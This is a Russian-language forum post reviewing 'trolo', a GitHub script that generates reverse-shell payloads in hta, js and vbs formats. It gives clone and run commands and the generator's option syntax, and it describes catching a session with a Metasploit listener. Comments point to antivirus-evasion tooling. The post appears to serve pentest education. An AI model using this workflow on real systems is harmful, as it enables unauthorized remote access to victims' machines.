• 🚨 29 мая стартует курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    После старта курса запись открыта еще 10 дней Подробнее о курсе ...

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

Статья Trolo - генератор полезной нагрузки

Добрый день всем!
Читал очень много статей, решил и сам попробовать написать обзор на один инструмент который нашел на гитхабе. Первый раз пишу поэтому прошу прощения если что то укажу не до конца.
Итак речь пойдет о trolo, скрипте для создания полезной нагрузки. Форматов нагрузки в нем не так много но все же думаю может кому и пригодится сие чудо.
Начнем с установки
Код:
git clone https://github.com/b3rito/trolo копируем
chmod +x trolo.sh даем права на запуск
./trolo.sh запуск скрипта
и если все чудесно то получаем это
Screenshot_3.png


идем далее, как видно нам предлагается заполнить данные для генерации нагрузки
  1. IP: 192.167.1.5 (пишем свой IP)
  2. порт (по умолчанию 443) я его оставил так же
  3. Имя файла полезной нагрузки (codeby)
  4. архитектура (х86/х64) в роли жертвы мой комп с архитектурой х86
  5. формат нагрузки (как видим список довольно небольшой (hta, js, vbs, custom) я выбрал в качестве теста нагрузку в hta
также можно сгенерировать нагрузку данной командой
Код:
./trolo.sh -i [IP] -p [PORT] -n [NAME] -f [FORMAT] -a [ARCH. x86/x64]

p.s. также у нас сохраняется не только нагрузка выбранного формата, но и код нагрузки в текстовом формате txt
Screenshot_4.png


далее нам предлагается запустить метасплоит для прослушки, разумеется пишем yes
Screenshot_5.png


ну и собственно после доставки полезной нагрузки получаем сессию
Без имени-1.jpg

Спасибо всем за внимание и доброй охоты;)
 
Последнее редактирование:
Ну нормас, пойдет) я статью писал про Phantom-Evasion, прочти, тебе понравится, там вообще не будет ав ругаться
 
  • Нравится
Реакции: Contror
Ну нормас, пойдет) я статью писал про Phantom-Evasion, прочти, тебе понравится, там вообще не будет ав ругаться
как раз только утром прочитал))) спасибо!

а кстати вопрос немного и по теме и нет, никто не в курсе почему файлы формата HTA иногда запускаются без вопроса о запуске а иногда с ним, как то довольно странно с учетом того что тестирую на одном и том же компе с одними и теми же настройками:confused:
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD